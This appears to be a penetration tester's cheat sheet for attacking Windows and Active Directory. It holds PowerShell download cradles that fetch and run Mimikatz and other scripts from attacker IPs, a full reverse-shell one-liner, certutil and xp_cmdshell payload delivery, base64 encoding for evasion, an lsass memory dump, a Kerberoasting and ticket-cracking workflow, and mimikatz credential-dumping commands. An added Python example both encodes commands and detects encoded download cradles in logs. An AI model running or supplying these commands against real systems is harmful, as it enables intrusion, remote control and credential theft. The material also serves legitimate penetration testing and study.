Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DC_NAME:1433"
Download files with PowerShell:
On a web shell:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
# DownloadFile needs a destination path and returns nothing, so it is not wrapped in IEX
powershell (New-Object Net.WebClient).DownloadFile('http://192.168.49.164/gori.ps1', 'gori.ps1')
powershell IEX(New-Object Net.WebClient).DownloadString('http://192.168.119.181/gori.ps1')
Transfer mimikatz to a Temp directory:
(New-Object Net.WebClient).DownloadFile("http://192.168.119.181:8080/mimikatz.exe","C:\Windows\Temp\mimikatz.exe")
certutil -urlcache -split -f http://192.168.119.212:80/tcp_power.ps1 C:\backup\Scripts\backup_powershell.ps1
powershell (New-Object Net.WebClient).DownloadFile("http://192.168.119.188:8000/mimikatz.exe","C:\Windows\Users\Bethany\Documents\mimikatz.exe")
powershell -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString("http://192.168.119.146/newkb.ps1");Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
xp_cmdshell 'powershell -c "IEX (New-Object Net.WebClient).DownloadString(''http://192.168.119.146:8080/stable.ps1'')"'
Get-NetDomain -Domain xor.com
$secpasswd = ConvertTo-SecureString 'PASSWORD' -AsPlainText -Force   # PASSWORD is a placeholder
$cred = New-Object System.Management.Automation.PSCredential('MSSQLSvc/DC_NAME\user', $secpasswd)
Cool reverse shell trick:
Reverse shell not working???
To avoid bad-character problems in the reverse shell (.ps1), first convert the script to UTF-16LE (the encoding PowerShell's -EncodedCommand parameter expects) and then base64-encode it:
cat reverse.ps1 | iconv -t UTF-16LE | base64 -w0
This converts the script to UTF-16 little-endian and then base64-encodes it.
Copy the output and pass it to -enc to run the script:
powershell.exe -nop -exec bypass -enc BASE64_COMMANDSSSSSS
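As an added example (not from the original notes), the same UTF-16LE + base64 construction in Python, together with the defender's counterpart: decoding -enc arguments found in process-creation log lines and flagging the download-cradle strings used in the one-liners above. The log lines and the 10.0.0.1 URL are constructed for the example.

```python
"""Added example: encode/decode PowerShell -EncodedCommand payloads and flag cradles in logs."""
import base64
import re
from typing import List, Optional, Tuple

# Matches -e / -ec / -enc / -EncodedCommand followed by a base64 blob (case-insensitive).
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Substrings typical of an in-memory download cradle, as seen in the one-liners above.
CRADLE_MARKERS = ("Net.WebClient", "DownloadString", "DownloadFile", "IEX", "Invoke-Expression")


def encode_command(script: str) -> str:
    """Same transformation as `iconv -t UTF-16LE | base64 -w0`: UTF-16LE bytes, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> Optional[str]:
    """Reverse it; return None when the blob is not valid base64 or not UTF-16LE text."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyse_log_line(line: str) -> dict:
    """Decode any encoded command on the line and list the cradle markers it contains."""
    m = ENC_RE.search(line)
    if not m:
        return {"encoded": False, "script": None, "markers": []}
    script = decode_command(m.group(1))
    lowered = script.lower() if script else ""
    markers = [k for k in CRADLE_MARKERS if k.lower() in lowered]
    return {"encoded": True, "script": script, "markers": markers}


def find_encoded_cradles(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, decoded script) for each line whose encoded payload looks like a cradle."""
    return [(i, r["script"]) for i, r in enumerate(map(analyse_log_line, lines)) if r["markers"]]


# Constructed sample log lines (not real telemetry); the URL 10.0.0.1 is made up.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/r.ps1')"
SAMPLE_LOGS = [
    "CommandLine: powershell.exe -nop -exec bypass -enc " + encode_command(CRADLE),
    "CommandLine: powershell.exe -Command Get-Date",
]

if __name__ == "__main__":
    for idx, script in find_encoded_cradles(SAMPLE_LOGS):
        print(f"line {idx}: encoded download cradle -> {script}")
```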
If mimikatz is not working, try a different version (e.g. 2.1).
Dumping lsass:
# 536 is the PID of lsass on that machine
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 536 C:\Users\administrator.xor\Desktop\lsass.dmp full
Active Directory Workflow (Case Study 1)
1. Obtain SPN data with GetSPN.ps1 (take notes on service names and domain info).
2. Copy nc.exe to the Windows machine and get a stable reverse shell back.
3. Once stable, open PowerShell and run:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "Servicename/domain:port"
4. Open mimikatz (make sure you have the right build for the OS: 32-bit or 64-bit) and dump the Kerberos tickets:
kerberos::list /export
This exports all the tickets; the resulting .kirbi files are saved on the victim's machine.
5. Copy the file over to Kali and convert it to hashcat format with kirbi2john.py.
Cracking a ticket:
python3 /home/kali/Downloads/kerberoast-master/tgsrepcrack.py ~/rockyou.txt kirby.kirby
6. Once cracked, you can try to log in to the account with evil-winrm (use the service account name you obtained in step 1):
./evil-winrm.rb -i IP -u User -p PASS
Look for plaintext passwords.
Mimikatz console (multiple commands)
PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # log
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
Mimikatz cheatsheet:
Then use psexec.py or evil-winrm to get an admin shell.